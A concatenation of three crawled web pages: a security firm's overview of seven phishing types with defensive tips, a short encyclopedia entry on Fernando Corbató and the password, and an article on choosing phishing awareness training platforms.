With phishing, the cybercriminals do not focus on the security of the network they wish to compromise. These cybercriminals instead look for ways to trick users to offer up their network credentials or other sensitive information; once obtained, these credentials are used by the cybercriminals to penetrate and compromise a network. Successful phishing attacks cost businesses a lot of money. On average, American businesses lose about $500 million to phishing attacks yearly.
There are several variants of phishing attacks that cybercriminals use when trying to compromise a network. This post discusses seven of the most common phishing variations and provides some tips on ensuring that your business is protected against a phishing attack.
1) Email phishing
This is the most common and most widely known phishing variant. With this variant, the cybercriminal sends the unsuspecting user a seemingly innocuous email with an embedded link. Clicking on the link within the email initiates the download of a virus or malware which then infects the user’s device. Following this, the cybercriminal can then steal the user’s credentials and then access the network freely. To increase the chances of the corrupt link being clicked, cybercriminals try to make the email as realistic as possible, often using a name that the user is familiar with as the sender.
Good observation is the best way to safeguard against this phishing variant. Pay close attention to any spelling mistakes or bad grammar in an email as these may be signs of a phishing email. As much as possible, avoid clicking on embedded links within an email; rather you should copy the link and open it in a new web browser. Train your employees how to identify attacks and how to avoid them.
With Vishing, cybercriminals attempt to make users give up their network credentials over the phone. They may claim to be someone in authority, salespeople or account representatives, among others. They are oftentimes very convincing such that unsuspecting users readily offer up their network credentials.
To guard against this phishing variant, you should never provide your credentials to anyone over the phone, especially your password. As a general rule, any request to provide your password over the phone should be treated with suspicion.
Smishing is similar to vishing and email phishing, the only difference being that the user is sent a text message with an embedded link. Once the link is clicked, a virus or malware is downloaded to the user’s device, corrupting it and thereby allowing access to the network.
The only defense against this form of phishing is to avoid clicking links in text messages when you are not familiar with the sender.
With pharming, cybercriminals install malware on a server or computer such that when users type in the correct web address, they are redirected to a bogus site instead. These users, thinking they are on the correct website, then enter their account credentials which are subsequently stolen by the cybercriminals.
Pharming is one of the more difficult variants of phishing to detect. The best way to guard against this is to look for the lock and key symbol at the bottom of your browser or the “s” in https. The absence of these is a strong indicator that a website is not secure.
5) In-session phishing
With this technique, a fake pop-up is generated as users browse on legitimate websites. The pop-up typically requests for account credentials or other personal information. Users, thinking that the pop-up is tied to the website they are browsing, enter their information which is then retrieved by the cybercriminals.
The best defense against this phishing technique is to always ensure that your browsers have pop-up blockers enabled.
6) Watering-hole attacks
Watering-hole attacks are a passive form of phishing attacks. In this instance, the attackers infect legitimate websites and simply wait for unsuspecting users to access these sites. Once these sites are accessed, the attackers are then able to retrieve the users’ account credentials.
This type of attack is extremely difficult to detect and guard against since the website appears legitimate and there’s no way to identify the phishing attempt.
7) Search engine attack
Also known as search engine poisoning, cybercriminals attempt to manipulate search engine results so that infected websites are at the top of search results. Users, believing the websites returned through their search to be genuine, enter their credentials into these websites and in so doing, offer up their account information to the cyber attackers.
This type of attack is also difficult to detect and guard against since a user doesn’t typically think about the websites in the search engine being dangerous to their computer.
With many possible phishing attack vectors through which your network can be compromised, it is important to engage the services of experts who are well versed in these attack techniques. At Cyber Sainik, we know all about the various phishing techniques and how to ensure that you do not become a victim. Contact us today for more information. | <urn:uuid:6354dbe1-0b45-409f-af7a-8861733ce238> | CC-MAIN-2022-40 | https://cybersainik.com/7-of-the-most-common-phishing-attacks-and-how-to-protect-against-them/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00519.warc.gz | en | 0.942805 | 1,119 | 2.71875 | 3 |
Fernando J. Corbató
Fernando J. Corbató was an American pioneer in the field of computer science who is best known as being the father of the password.
Corbató was a physicist whose interests evolved into what would become a burgeoning field in its own right, computer science. As computers grew in their development and dependability, a use case for one of Corbató’s own creations, the Compatible Time-Sharing System (CTSS), emerged. How to securely and practically expand the user population became immediately important. Toward this end Corbató conceived and applied the concept of a password — familiar in the physical world — to computers. Upon his death in 2019 the Massachusetts Institute of Technology, where his work was done at the time, credited Corbató with “drastically expanding the usefulness” of computers.
In addition to the CTSS, while at MIT’s Computation Center from 1963-66, Corbató developed a Multiplexed Information and Computing Service (Multics) that built upon the CTSS’s success and could be deployed and useful to a larger population. Also while there, he did foundational work on the operating system UNIX.
“Fernando J. Corbató applied the use of a closely-held mutual secret — the password — to the novel challenge of how to manage multiple users of a computer. This paved the way for expanded uses of computers across the enterprise and later, with the emergence or the web, large user populations.” | <urn:uuid:01e1fc98-2d31-4e7a-b36b-6e0ad1a42c3e> | CC-MAIN-2022-40 | https://www.hypr.com/security-encyclopedia/fernando-j-corbato | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00519.warc.gz | en | 0.942392 | 325 | 3.28125 | 3 |
Phishing attacks are one of the most dangerous, and the most common, email threats that modern organizations are facing, with lost or stolen credentials accounting for a quarter of all successful breaches as attackers continue to exploit our dependence on email communication in an increasingly digital world. But what do phishing attempts look like?
Traditional phishing emails target hundreds of recipients at a time. They trick users into opening a link to a webpage where they’re asked to enter personal information. As we’ve learned about their existence, though, we’ve become better at ignoring or reporting phishing emails. However, attackers have developed a more targeted method of phishing: spear-phishing. This is where it becomes personal. The attacker impersonates someone that you trust, such as a regular stakeholder, so that you’re less likely to question them when they ask you for sensitive information.
And as phishing attacks become more sophisticated, security teams need to implement more sophisticated protection to stop their users from falling for a malicious lure. The best way to do this is to implement multiple layers of security that combine technical protection, such as a Secure Email Gateway or cloud email security solution, with human intelligence, such as phishing awareness training.
What Is Phishing Awareness Training?
Sophisticated phishing attacks can slip through even the most powerful email gateway solutions to target end users directly. As the threat of these attacks grows, organizations are looking for new ways to protect their users. One way of doing this is by implementing awareness training.
Phishing awareness training teaches users how to identify suspicious emails, and how to apply best practices in response to receiving them. They usually involve users taking a virtual training course, usually made up of scenario-based videos and quizzes. Once they’ve completed the course, the user is tested with simulated phishing emails. If they don’t report the emails, administrators can assign them further training.
Why Does Phishing Awareness Training Work?
Phishing awareness training cultivates a security-first mindset that prioritizes data protection and network security. It does this by providing employees with the knowledge and tools they need to combat phishing attacks. Carefully designed programs teach users how to detect and react to threats so that they can help protect sensitive data, rather than being considered an easy way into an organization’s network.
It’s thanks to powerful training and simulation solutions that recent years have seen a decrease in phishing click rates and an increase in reporting rates, despite the volume of phishing attacks increasing year on year.
What Features Should You Look For In a Phishing Awareness Training Platform?
There are a number of different phishing awareness training solutions out there, and it can be difficult to know which one is best suited to your needs. The most effective solutions include the following features, so keeping an eye out for these is a good place to start:
- A multi-media content library that’s regularly updated. Note the emphasis on “multi-media”! Your employees will all have individual learning styles, so a variety of materials will make sure that the material is engaging for everyone. And when the library is regularly updated, you can be sure that it will contain information on the newest threats that organizations are facing.
- Customization. It’s important that you can build learning paths or tailor modules to target specific threats that your organization is facing. It’s also important that simulated phishing emails designed to test employees can be customized to mimic the types of emails your employees typically receive.
- Interactivity. Quizzes, tests and gamification are sure-fire ways to increase user engagement which, in turn, increases information retention. This means that your employees will remember what they’ve learned and be much more likely to put it into practice.
- Simulations. You need to be able to test what your employees have learned, and the best way to do this is through simulated phishing emails. Users should report these emails, either through the solution’s inbuilt reporting button (see below) or by contacting their IT desk, but if they don’t, they’ll be directed to a landing page that explains their mistake.
- A “Report Phishing” button. These inbox plugins allow users to report not only simulated phishing emails, but also genuine threats, to their IT department. They’re a quick and easy way to flag suspicious content. The best simulations go a step further, with automated analysis based on reported phishing attempts, and triaging of reported emails. Agari’s 2020 Phishing Incident Response Survey found that 67% of all reported incidents were false positives, i.e. not real threats at all. Automated analysis saves security teams valuable time by separating false positives from genuine threats, then prioritizing these threats.
- Admin reporting tools. The best simulation solutions include admin reporting so that you can see who is falling for simulated threats. This means that you can direct those employees towards specific training materials, and re-test them in future simulations.
You know how your organization works and which of the above features will be most useful for the way in which you operate but, generally, it’s a good idea to find a solution that incorporates all of them.
There isn’t a single “silver bullet” solution that will offer full protection against phishing threats. It’s important that we implement a multi-layered solution, combining technical and human protection. With phishing awareness training and simulations, you can transform your employees from potential victims into a solid line of defense against phishing threats.
If you’d like some advice on which solutions will work best for your organization, take a look at our guide to the Top 10 Phishing Awareness Training and Simulation Solutions. | <urn:uuid:ea16ce79-6e99-4207-8b0c-29fd14d29eba> | CC-MAIN-2022-40 | https://expertinsights.com/insights/phishing-awareness-training-why-it-works-and-how-to-choose-the-right-platform/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00519.warc.gz | en | 0.948963 | 1,203 | 2.921875 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.